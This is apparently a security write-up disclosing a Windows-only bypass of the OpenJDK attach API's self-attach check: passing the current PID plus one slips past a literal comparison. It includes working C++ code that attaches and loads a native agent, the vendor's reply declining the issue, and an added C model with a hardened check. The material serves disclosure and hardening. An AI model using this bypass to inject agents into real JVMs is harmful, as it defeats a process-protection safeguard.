[2024] HotSpotVirtualMachine.java self-attach check bypass

huoji, 2024-02-22

HotSpotVirtualMachine.java
https://github.com/openjdk/jdk/blob/4b9ec8245187a2eaccc711a6e5d3d4915dd022c9/src/jdk.attach/share/classes/sun/tools/attach/HotSpotVirtualMachine.java#L49

```java
if (!ALLOW_ATTACH_SELF && (pid == 0 || pid == CURRENT_PID)) {
    throw new IOException("Can not attach to current VM");
}
```

`ALLOW_ATTACH_SELF` is the `jdk.attach.allowAttachSelf` property; by default it is off, so the attach API refuses to attach to the JVM it is running in. The refusal, however, is a literal comparison of the caller-supplied number against `CURRENT_PID`.

On Windows, process IDs are always multiples of 4, and a PID that is not a multiple of 4 is rounded down to the previous multiple of 4 when the kernel resolves it. So if the current PID is 8, passing 9, 10 or 11 still opens the current process, but none of those values equals `CURRENT_PID`, and the self-attach check is bypassed:

```cpp
virtualMachineClass.cs_call(
    "attach",
    "(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine;",
    std::to_string(targetPid + 1).c_str());
```

Attaching to `targetPid + 1` passes the check. Full code (the `jni::Vm`, `jni::Class` and `jni::Object` types are the author's own JNI wrapper, not shown here; `std::exception(const char*)` is an MSVC-specific constructor, consistent with this being Windows-only code):

```cpp
#include <cstdio>
#include <exception>
#include <string>

// modulePathA: path to the JVM's jvm.dll to load into this process.
// attachedAgentPath: path of the agent library to load into the target JVM.
auto JavaAttach(const size_t pid, std::string modulePathA, std::string attachedAgentPath) -> bool {
    bool isSuccess = false;
    auto targetPid = pid;
    try {
#ifdef _TEST
        printf("start attach ,path: %s \n", modulePathA.c_str());
#endif
        // Create a JVM in this process so the com.sun.tools.attach API can be called.
        jni::Vm vm(modulePathA.c_str());
        jni::Class virtualMachineClass = jni::Class("com/sun/tools/attach/VirtualMachine");
        if (virtualMachineClass.isNull()) {
            throw std::exception("virtualMachineClass is null");
        }
#ifdef _TEST
        printf("look up the virtualmachine start attach... \n");
#endif
        // Attach to pid + 1: Windows resolves the non-multiple-of-4 PID back to pid,
        // but the string no longer equals CURRENT_PID, so the self-attach check passes.
        jni::Object virtualMachineObject = virtualMachineClass.cs_call(
            "attach",
            "(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine;",
            std::to_string(targetPid + 1).c_str());
        if (virtualMachineObject.isNull()) {
            throw std::exception("virtualMachineObject is null");
        }
        // VirtualMachine.loadAgentPath(String): load a native agent into the target JVM.
        virtualMachineClass.cs_dynamic_call(
            virtualMachineObject, "loadAgentPath", "(Ljava/lang/String;)V",
            attachedAgentPath.c_str());
        isSuccess = true;
#ifdef _TEST
        printf("success \n");
#endif // _TEST
    } catch (const std::exception &e) {
#ifdef _TEST
        printf("Exception %s \n", e.what());
#endif // _TEST
    }
    return isSuccess;
}
```

After reporting this upstream, the official reply was:

```
Hello,

It is true that the code does not compensate for non-factor of four PIDs on Windows.
However, one would need access/privileges to run in the debugger or use JNI to deliver an invalid PID as the OS enforces the limitation. With this level of access any attacker could do far worse things to the Java process.

We would like to decline this issue. Please let us know if you view it differently and please provide more detail to support the case.
```

This article was written by huoji and is licensed under Creative Commons Attribution 3.0; it may be freely reposted and quoted with attribution to the author and a link to the original.
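The following C program is an added example, not part of huoji's post or of the OpenJDK code. It models the PID behaviour the post relies on and contrasts the literal check in HotSpotVirtualMachine.java with a hardened variant that compares PIDs after normalizing them the way the OS does. The `canonical_pid` masking (clearing the low two bits, so 9, 10 and 11 all resolve to 8) is an assumption about the Windows kernel's handling of process IDs consistent with the rounding the post describes; `self_attach_check_original` and `self_attach_check_hardened` are names chosen here, not OpenJDK functions. When compiled on Windows, `resolve_pid_windows` additionally asks the live kernel, via `OpenProcess` and `GetProcessId`, which process `GetCurrentProcessId() + 1` really opens, which is the quickest way to confirm the bypass on a given machine.

```c
#include <stdio.h>

/* Model of Windows PID resolution (assumption: the kernel ignores the low two bits
 * of a process ID, so 9, 10 and 11 all resolve to process 8). On non-Windows
 * systems a PID is taken literally, so no normalization is applied. */
unsigned long canonical_pid(unsigned long pid, int is_windows) {
    return is_windows ? (pid & ~3UL) : pid;
}

/* The check as written in HotSpotVirtualMachine.java: a literal comparison
 * of the caller-supplied PID against the current PID. */
int self_attach_check_original(unsigned long pid, unsigned long current_pid) {
    return pid == 0 || pid == current_pid;
}

/* Hardened variant (not OpenJDK code): normalize both sides the same way the
 * OS will before resolving the PID, so 9, 10 and 11 are still "self" when the
 * current PID is 8, while 12 (the next possible process) is not. */
int self_attach_check_hardened(unsigned long pid, unsigned long current_pid, int is_windows) {
    if (pid == 0) return 1;
    return canonical_pid(pid, is_windows) == canonical_pid(current_pid, is_windows);
}

#ifdef _WIN32
#include <windows.h>
/* Live check on Windows: open `pid` and ask the kernel which process the handle
 * really refers to. Returns 0 if OpenProcess fails. */
unsigned long resolve_pid_windows(unsigned long pid) {
    HANDLE h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, (DWORD)pid);
    if (h == NULL) return 0;
    unsigned long real = GetProcessId(h);
    CloseHandle(h);
    return real;
}
#endif

int main(void) {
    /* Constructed example: pretend the current JVM has PID 8 (a real Windows PID
     * is always a multiple of 4). Offsets 1..3 are the bypass values from the post. */
    unsigned long cur = 8;
    for (unsigned long offset = 0; offset < 5; offset++) {
        unsigned long p = cur + offset;
        printf("pid %lu: resolves to %lu, original check %s, hardened check %s\n",
               p, canonical_pid(p, 1),
               self_attach_check_original(p, cur) ? "blocks" : "passes",
               self_attach_check_hardened(p, cur, 1) ? "blocks" : "passes");
    }
#ifdef _WIN32
    unsigned long me = GetCurrentProcessId();
    for (unsigned long p = me + 1; p <= me + 3; p++) {
        printf("live: OpenProcess(%lu) -> real PID %lu (this process is %lu)\n",
               p, resolve_pid_windows(p), me);
    }
#endif
    return 0;
}
```

The model run shows the original check passing 9, 10 and 11 while the hardened check blocks them and still allows 12; on a Windows build the live loop should print the caller's own PID for all three `+1..+3` values, which is the observation the post is built on. Note that the hardened comparison must be gated on Windows: on Linux, PID 9 is a genuinely different process from PID 8 and must not be rejected as "self".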